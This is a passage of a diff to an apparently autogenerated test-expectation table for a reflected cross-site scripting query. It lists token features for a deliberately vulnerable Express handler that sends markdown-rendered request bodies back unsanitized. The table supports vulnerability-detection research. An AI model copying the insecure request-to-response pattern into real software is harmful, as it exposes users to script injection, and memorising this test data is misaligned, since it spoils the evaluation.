\ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:7:68:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:7:68:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:17 | remark | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:17 | remark | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:17 | remark | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:17 | remark | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:17 | remark | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:19 | exceptional return of remark() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:19 | exceptional return of remark() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:19 | exceptional return of remark() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:19 | exceptional return of remark() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:19 | exceptional return of remark() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:19 | remark() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:19 | remark() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:19 | remark() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:19 | remark() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:19 | remark() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:31 | remark().processSync | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:31 | remark().processSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:31 | remark().processSync | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:31 | remark().processSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:31 | remark().processSync | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:41 | exceptional return of remark( ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:41 | exceptional return of remark( ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:41 | exceptional return of remark( ... q.body) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:41 | exceptional return of remark( ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:41 | exceptional return of remark( ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:41 | remark( ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:41 | remark( ... q.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:41 | remark( ... q.body) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:41 | remark( ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:41 | remark( ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:50 | remark( ... oString | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:50 | remark( ... oString | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:50 | remark( ... oString | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:50 | remark( ... oString | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:50 | remark( ... oString | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | exceptional return of remark( ... tring() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | exceptional return of remark( ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | exceptional return of remark( ... tring() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | exceptional return of remark( ... tring() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | exceptional return of remark( ... tring() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | remark( ... tring() | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | remark( ... tring() | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | remark( ... tring() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19912,6 +133651,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | remark( ... tring() | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | remark( ... tring() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:12:68:52 | remark( ... tring() | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:21:68:31 | processSync | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:21:68:31 | processSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:21:68:31 | processSync | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:21:68:31 | processSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:21:68:31 | processSync | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:35 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:35 | req | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:35 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:40 | req.body | CalleeFlexibleAccessPath | remark().processSync | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:40 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:40 | req.body | calleeImports | remark | @@ -19920,6 +133669,96 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:40 | req.body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:40 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:33:68:40 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:37:68:40 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:37:68:40 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:37:68:40 | body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:37:68:40 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:37:68:40 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:43:68:50 | toString | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:43:68:50 | toString | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:43:68:50 | toString | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:43:68:50 | toString | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:68:43:68:50 | toString | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:5 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:10 | res.send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:67 | exceptional return of res.sen ... ring()) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:67 | exceptional return of res.sen ... ring()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:67 | exceptional return of res.sen ... ring()) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:67 | exceptional return of res.sen ... ring()) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:67 | exceptional return of res.sen ... ring()) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:67 | res.sen ... ring()) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:67 | res.sen ... ring()) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:67 | res.sen ... ring()) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:67 | res.sen ... ring()) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:3:70:67 | res.sen ... ring()) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:7:70:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:7:70:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:7:70:10 | send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:7:70:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:7:70:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:17 | remark | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:17 | remark | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:17 | remark | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:17 | remark | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:17 | remark | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:19 | exceptional return of remark() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:19 | exceptional return of remark() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:19 | exceptional return of remark() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:19 | exceptional return of remark() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:19 | exceptional return of remark() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:19 | remark() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:19 | remark() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:19 | remark() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:19 | remark() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:19 | remark() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:23 | remark().use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:23 | remark().use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:23 | remark().use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:23 | remark().use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:23 | remark().use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:33 | exceptional return of remark( ... nitize) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:33 | exceptional return of remark( ... nitize) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:33 | exceptional return of remark( ... nitize) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:33 | exceptional return of remark( ... nitize) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:33 | exceptional return of remark( ... nitize) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:33 | remark( ... nitize) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:33 | remark( ... nitize) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:33 | remark( ... nitize) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:33 | remark( ... nitize) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:33 | remark( ... nitize) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:45 | remark( ... essSync | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:45 | remark( ... essSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:45 | remark( ... essSync | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:45 | remark( ... essSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:45 | remark( ... essSync | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:55 | exceptional return of remark( ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:55 | exceptional return of remark( ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:55 | exceptional return of remark( ... q.body) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:55 | exceptional return of remark( ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:55 | exceptional return of remark( ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:55 | remark( ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:55 | remark( ... q.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:55 | remark( ... q.body) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:55 | remark( ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:55 | remark( ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked 